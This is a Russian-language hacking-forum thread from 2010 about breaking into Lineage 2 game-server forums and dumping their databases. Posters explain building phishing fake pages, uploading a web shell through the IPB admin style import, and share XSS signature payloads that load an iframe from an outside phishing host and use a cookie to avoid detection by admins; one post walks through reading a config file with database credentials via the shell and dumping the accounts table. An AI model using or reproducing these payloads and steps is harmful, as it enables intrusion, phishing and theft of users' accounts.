Взлом БД через форум с xss

gladvoz · 08.06.2010, 18:24

делаю фейк, заливаю на хостинг. и в место слов получается вот это
[Ссылки могут видеть только зарегистрированные пользователи. ]

~~fesssi~~ · 08.06.2010, 18:29

Вопрос: Программа создала фейк но там не понятна кодировка, всякие квадратики и т.д
Ответ: В программе, внизу где 'Дополнительная замена строк'
Введите в поле 'C' => charset=utf-8
Введите в поле 'На' => charset=windows-1251

Все описано тут:http://zhyk.ru/forum/showthread.php?t=79105 ©m0nk

**Chipito** · 08.06.2010, 18:37

В общем все просто
находим доступ в админку, заходим
Далее - Внешний Вид
тут:
Если скин IP.Board Pro то делаем так:
1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем.
2. Импорт и экспорт стилей - Импорт... - Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем
узнаем где лежит шелл, заходим в настройки скина IP.Board Pro
Директория с изображениями - ip.boardpr1228455805 (в моем случае)
Изменяем так как было изначально.

Шелл будет доступен в директории
[Ссылки могут видеть только зарегистрированные пользователи. ]
(С) Ачат c0m
Вот сами два файла:
[Ссылки могут видеть только зарегистрированные пользователи. ] (images)
[Ссылки могут видеть только зарегистрированные пользователи. ] (styles)
ЗЫ Отчет с вирустотала архивов не делал=) т.к. их можна даже не открывать у себя на машине.

~~m0nk~~ · 08.06.2010, 18:52

Chipito если не ошибаюсь это для 3 версии, и самый сложный способ т.к. нужно качать денвер + сам движок форума устанавливать и т.д. Через аватар or sql и настройки легче

**Chipito** · 08.06.2010, 18:54

Цитата:

Сообщение от m0nk


	Chipito если не ошибаюсь это для 3 версии, и самый сложный способ т.к. нужно качать денвер + сам движок форума устанавливать и т.д. Через аватар or sql и настройки легче

Оо какой денвер и движок?
Заходим в админку,заливаем стили,потом настройки стилей,смотрим директорию с изображениями и все=)
Да и подходит он к любой версии,вспомни видео,как сливали базу l2europe.net

Me$$iah · 09.06.2010, 12:56

Почему первый скрипт (без куки) переходит сразу на фейк при загрузке подписи с любого браузера, а скрипт с кукисами вообще не работает? В чём разница кроме сохранения кукисов?

Цитата:


	[acronym=[acronym= style=background:url('//') onerror=document.write("\x3C****\x20src=h&# x74;tp://la&#x3 2;crystal. hx0.ru/\x20fram eborder=0\x20width=100%\x20height=100%\x20scrollin g=no\x3E\x3C/****\x3E");document.close(); ]][/acronym][/acronym] [/acronym][/acronym][/size]

Цитата:


	[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime( )+302460601000);document.cookie=\x22ipb_my=123 6;\x20expires=\x22+valid_until.toGMTString();docum ent.write(\x22\x3C****\x20src=htt p://la2c&# x72;ystal.h&#x7 8;0.ru/\x20frameborder=0\ x20width=100%\x20height=100%\x20scrolling=no\x3E\x 3C/****\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]

~~m0nk~~ · 09.06.2010, 13:29

Цитата:

Сообщение от Chipito


	Оо какой денвер и движок? Заходим в админку,заливаем стили,потом настройки стилей,смотрим директорию с изображениями и все=) Да и подходит он к любой версии,вспомни видео,как сливали базу l2europe.net

Извеняюсь до конца сообщение не прочитал, просто вот эти файлы [Ссылки могут видеть только зарегистрированные пользователи. ] (images)
[Ссылки могут видеть только зарегистрированные пользователи. ] (styles) делали через денвер + движок)

Цитата:

Сообщение от Me$$iah


	Почему первый скрипт (без куки) переходит сразу на фейк при загрузке подписи с любого браузера, а скрипт с кукисами вообще не работает? В чём разница кроме сохранения кукисов?

Скрипт с куками работает, тебя переадресовывает один раз, при следующем разе не переадресует т.к. записалась кука ipb=1234 и пока ты куки не почистишь тебя переадресовывать не будет, это сделано для того чтоб не палиться. Как админ сможет прочитать твое лс если его будет перекидывать на фейк все время, он впалит сразу.

LastHero · 09.06.2010, 15:40

m0nk ссылка как исправить потерта,хотелось бы узнать тут или в лс

~~fesssi~~ · 09.06.2010, 15:41

Цитата:

Сообщение от (c)Fun


	forum.la2mega.com у вас фейк нормально делается? потому что когда я сделал фейк,он почти голый без оформления.

Была похожая лажа форум уже непомню... Но переделал так сделал дубликат фарума на локольную тачку например прогой Телепорт)
Потом закинул файлы с картинками на хостинг где фейк лежыт ну и переделал Индекс файл что бы он читал прямо с хостинга фейка картинки)
Мне лично помогло.
Удачи)

~~m0nk~~ · 09.06.2010, 17:32

Как сделать фейк если скин другой?

И часто меня спрашивают как залить шелл?

Как слить бд через шелл?

Залили шелл [Ссылки могут видеть только зарегистрированные пользователи. ] (пароль по умолчанию root) переходим в самый корень папки (нажимайте [ .. ] ) пока не увидите папку inc далее переходите выбираете [ data ] далее где config_db.php переходим, видим что то вроде этого:

Код:

<?php
/**
 * STRESS WEB
 * @author Alexandr Yuschenko (S.T.R.E.S.S.)
 * @copyright 2008 - 2009 STRESS WEB
 * @version 8.0
 * @web http://stressweb.ru  
 */
if (!defined('STRESSWEB')) die ('Hacking!!!');
define("DBHOST","localhost");
define("DBUSER","root");
define("DBPASS","sslimruless");
define("DBNAME","l2jdb2");
define("COLLATE","cp1251");
define("SERIAL",""); 
?>

Далее где кнопки (сверху)
[ Sec. Info ] [ Files ] [ Console ] [ Sql ] [ Php ] [ Safe mode ] [ String tools ] [ Bruteforce ] [ Network ] [ Logout ] [ Self remove ]

нажимаем на [ Sql ]

где Host пишем localhost где Login пишем root где Password пишем sslimruless и нажимаем >> или enter.
Далее нажимаем на список где Database
и выбираем l2jdb2 (можно и другие посмотреть)
и нажимаем снова >> или ентер

Далее видим список

Код:

access_levels 
 account_data 
 accounts 
 admin_command_access_rights 
 admin_login_logs 
 admin_logs 
 admin_permission_rows 
 announcements 
 api_log 
 api_users 
 armor 
 armorsets 
 attachments 
 attachments_type 
 auction .......

нам нужна папка accounts слева ставим галочку внизу нажимаем dump
В итоге качаем бд по ссылке forum/uploads/dump.sql

Как сделать себя админом расскажет вам Chipito =)

Но лучше не палиться а настроить апач, админка в хакерском варианте(управление через сайт только для ИТ), [Ссылки могут видеть только зарегистрированные пользователи. ]

И в конце концов

P.S.S За шелл спасибо Relikt'у

~~m0nk~~ · 09.06.2010, 19:45

Измени кодировку в блокноте, и поясни свой вопрос нормально)

p.Number0ne · 09.06.2010, 19:55

На компе норм открывается индекс а на компе а кода залил нефига

Добавлено через 6 минут
В блакноте не могу найти как изменить кодировку (((

Me$$iah · 09.06.2010, 20:24

Цитата:

Сообщение от m0nk


	Скрипт с куками работает, тебя переадресовывает один раз, при следующем разе не переадресует т.к. записалась кука ipb=1234 и пока ты куки не почистишь тебя переадресовывать не будет, это сделано для того чтоб не палиться. Как админ сможет прочитать твое лс если его будет перекидывать на фейк все время, он впалит сразу.

Это я понимаю. Я наверно не правильно выразился. Я имел ввиду то, что у меня ни в одном браузере не работает скрипт с автопереадресацией с куками (Когда переадресация идёт без участия мышки).

fireridlle · 09.06.2010, 20:52

почисть куки и переадресует или если ты искользовал первый скрипт то наведи мышку на подпись

~~BlackWinG~~ · 10.06.2010, 00:01

Просто МБ на том ФОруме Фикс и там просто не пашет

Взлом БД через форум с xss

Базы серверов и брут